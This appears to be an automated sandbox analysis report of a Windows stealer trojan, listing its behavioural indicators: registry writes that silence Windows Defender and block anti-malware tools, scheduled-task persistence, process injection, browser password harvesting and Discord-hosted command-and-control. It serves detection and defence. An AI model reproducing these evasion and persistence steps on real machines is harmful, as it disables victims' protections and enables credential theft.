Malware Analysis Report

2024-12-07 14:47

Sample ID 241007-mpm6xa1arm
Target 1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118
SHA256 3412cec072f1a9b403fcc7d2e8de28d0bde2d3a5a2e39089c519c2d12646b644
Tags
defense_evasion discovery evasion execution exploit spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3412cec072f1a9b403fcc7d2e8de28d0bde2d3a5a2e39089c519c2d12646b644

Threat Level: Known bad

The file 1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion execution exploit spyware stealer trojan upx

Modifies security service

Suspicious use of NtCreateUserProcessOtherParentProcess

Modifies Windows Defender notification settings

Detected Nirsoft tools

NirSoft WebBrowserPassView

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Possible privilege escalation attempt

Blocks application from running via registry modification

Loads dropped DLL

Checks BIOS information in registry

Checks computer location settings

Executes dropped EXE

Reads user/profile data of web browsers

Indicator Removal: Clear Windows Event Logs

Modifies file permissions

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Suspicious use of SetThreadContext

Drops file in System32 directory

UPX packed file

Drops file in Windows directory

Enumerates physical storage devices

Browser Information Discovery

Unsigned PE

System Location Discovery: System Language Discovery

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Suspicious behavior: CmdExeWriteProcessMemorySpam

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Scheduled Task/Job: Scheduled Task

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Modifies registry class

Kills process with taskkill

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-07 10:38

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-07 10:38

Reported

2024-10-07 10:41

Platform

win7-20240729-en

Max time kernel

149s

Max time network

150s

Command Line

winlogon.exe

Signatures

Modifies Windows Defender notification settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" C:\Windows\system32\reg.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP C:\Windows\System32\svchost.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection C:\Windows\System32\svchost.exe N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1608 created 432 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe
PID 1516 created 432 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocks application from running via registry modification

evasion
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "MBSetup.exe" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "mbar.exe" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "rkill.exe" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "rkill32.exe" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "mbam.exe" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "MRT.exe" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "rkill64.exe" C:\Windows\system32\reg.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Reads user/profile data of web browsers

spyware stealer

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api64.ipify.org N/A N/A
N/A ip-api.com N/A N/A
N/A api64.ipify.org N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\Recovery C:\Windows\system32\ReAgentc.exe N/A
File opened for modification C:\Windows\system32\Recovery\ReAgent.xml C:\Windows\system32\ReAgentc.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1608 set thread context of 1740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1516 set thread context of 1392 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\SysWOW64\dllhost.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\$77svc64.job C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe N/A
File opened for modification C:\Windows\Tasks\$77svc64.job C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe N/A
File opened for modification C:\Windows\Tasks\$77svc64.job C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\Tasks\$77svc32.job C:\Windows\system32\svchost.exe N/A
File created C:\Windows\Tasks\$77svc32.job C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe N/A
File opened for modification C:\Windows\Tasks\$77svc32.job C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Microsoft\Windows\Install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\winhlp32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\splwow64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\$77Redownloader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\dllhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\hh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\xwizard.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\$77main1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e0d04b1da518db01 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\dllhost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\$77Redownloader.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1760 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe C:\Users\$77main1.exe
PID 1760 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe C:\Users\$77main1.exe
PID 1760 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe C:\Users\$77main1.exe
PID 1760 wrote to memory of 2880 N/A C:\Users\Admin\AppData\Local\Temp\1cfa59cf9fe17fbacc47910d45236945_JaffaCakes118.exe C:\Users\$77main1.exe
PID 2880 wrote to memory of 2936 N/A C:\Users\$77main1.exe C:\Windows\system32\cmd.exe
PID 2880 wrote to memory of 2936 N/A C:\Users\$77main1.exe C:\Windows\system32\cmd.exe
PID 2880 wrote to memory of 2936 N/A C:\Users\$77main1.exe C:\Windows\system32\cmd.exe
PID 2880 wrote to memory of 2936 N/A C:\Users\$77main1.exe C:\Windows\system32\cmd.exe
PID 2936 wrote to memory of 2980 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2936 wrote to memory of 2980 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2936 wrote to memory of 2980 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2936 wrote to memory of 1960 N/A C:\Windows\system32\cmd.exe C:\Users\$77Redownloader.exe
PID 2936 wrote to memory of 1960 N/A C:\Windows\system32\cmd.exe C:\Users\$77Redownloader.exe
PID 2936 wrote to memory of 1960 N/A C:\Windows\system32\cmd.exe C:\Users\$77Redownloader.exe
PID 2936 wrote to memory of 1960 N/A C:\Windows\system32\cmd.exe C:\Users\$77Redownloader.exe
PID 2936 wrote to memory of 2860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2696 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2712 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2936 wrote to memory of 2256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2936 wrote to memory of 2256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2936 wrote to memory of 2256 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2936 wrote to memory of 948 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
PID 2936 wrote to memory of 948 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
PID 2936 wrote to memory of 948 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\$77Stellacy.exe
PID 2936 wrote to memory of 576 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe
PID 2936 wrote to memory of 576 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe
PID 2936 wrote to memory of 576 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe
PID 2936 wrote to memory of 576 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\$77STLR.exe
PID 2936 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2936 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2936 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2936 wrote to memory of 1948 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
